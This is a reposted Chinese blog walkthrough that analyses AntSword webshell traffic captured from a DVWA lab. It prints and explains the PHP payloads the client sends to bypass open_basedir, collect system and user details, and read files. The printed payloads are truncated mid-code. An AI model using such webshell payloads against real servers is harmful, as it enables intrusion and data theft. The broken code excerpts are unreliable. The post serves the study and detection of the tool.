文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

中国蚁剑的工作原理

2023-09-09 10:57

关注
  1. 中国蚁剑连接http://192.168.11.157/dvwa/hackable/uploads/pass.php

  1. 蚁剑连接并同时用wireshark抓取流量

  1. 1274 行,追踪tcp流

  1. 因为我们的php.php内容是 $_POST['pass'],所以这里是post了一个pass参数,后面跟上了命令。通过站长工具-URL解码/编码 (wetimer.com)url解码、PHP格式化,在线美化PHP代码-站长工具 (senlt.cn)看一下:

@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {    $ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);    $oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);    @array_push($oparr,$ocwd,sys_get_temp_dir());    foreach($oparr as $item) {        if(!@is_writable($item)) {            continue;        };        $tmdir=$item."/.4044a0d3a48";        @mkdir($tmdir);        if(!@file_exists($tmdir)) {            continue;        }        $tmdir=realpath($tmdir);        @chdir($tmdir);        @ini_set("open_basedir", "..");        $cntarr=@preg_split("/\\\\|\//",$tmdir);        for ($i=0;$igetMessage();};asoutput();die();

从上往下分析:

@ini_set(“display_errors”, “0”);是临时关闭PHP的错误显示功能

@set_time_limit(0);是设置执行时间,为零说明永久执行直到程序结束,是为了防止像dir、上传文件大马时超时

asenc函数:简单的接收参数然后直接返回

asoutput函数:先用ob_get_contents得到缓冲区的数据。然后用ob_end_clean清除缓冲区的内容,并将缓冲区关闭。然后把接收到的缓冲区数据输出

ob_start()是在服务器打开一个缓冲区来保存所有的输出

try里面:

$_SERVER[“SCRIPT_FILENAME”]是获取当前执行脚本的绝对路径。

dirname() 函数返回路径中的目录名称部分,也就是说$D是当前执行脚本所在的目录。

如果$D为空,那么就用$_SERVER[“PATH_TRANSLATED”]获取当前脚本所在文件系统(不是文档根目录)的基本路径。这是在服务器进行虚拟到真实路径的映像后的结果。

然后把获取到的$D加上TAB赋值给$R

然后下面的if:

先判断$D的第一位是不是/,这里应该是在判断是linux系统还是windows系统。

假如是windows,就从C到Z循环,is_dir是判断是否存在这个盘符目录。假如存在这个盘符就添加在$R的后面。

然后就是判断posix_getegid函数是否存在,如果存在posix_getegid函数存在就获取信息赋值给$u,否则$u为空

然后下面判断$u是否为空,假如不为空就获取键值为name的值给$s,否则用get_current_user函数获取当前PHP脚本所有者的名称赋值给$s。

然后用 php_uname 函数获取 有关正在运行的操作系统PHP的信息,并将其添加在$R后面,然后把上面获取的$s也添加在$R后面。然后输出$R。

假如出错就返回错误信息:

再看一下数据包返回信息,就理解了上面这些代码是干嘛的:

当前执行脚本所在的路径 正在运行的操作系统PHP的信息 当前PHP脚本所有者的名称

  1. 1281行,打开了一个php文件,看一下发送的指令:

@ini_set("display_errors", "0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {    $ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);    $oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);    @array_push($oparr,$ocwd,sys_get_temp_dir());    foreach($oparr as $item) {        if(!@is_writable($item)) {            continue;        };        $tmdir=$item."/.f01ac485ec";        @mkdir($tmdir);        if(!@file_exists($tmdir)) {            continue;        }        $tmdir=realpath($tmdir);        @chdir($tmdir);        @ini_set("open_basedir", "..");        $cntarr=@preg_split("/\\\\|\//",$tmdir);        for ($i=0;$igetMessage();};asoutput();die();&u928cced13ca85=RNL3Zhci93d3cvZHZ3YS9oYWNrYWJsZS91cGxvYWRzL3Bhc3MucGhw

看下try里面的内容:

将从POST传过来的u928cced13ca85变量去掉前2个字符后再进行base64解码赋值给$F:

然后用只读的方式打开文件,然后读文件,假如文件大小为空就默认读4096字节,然后关闭文件流:

在最后,传了上面所说的奇怪变量名参数u928cced13ca85

base64解码看看:

来源地址:https://blog.csdn.net/leiwuhen92/article/details/128658035

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯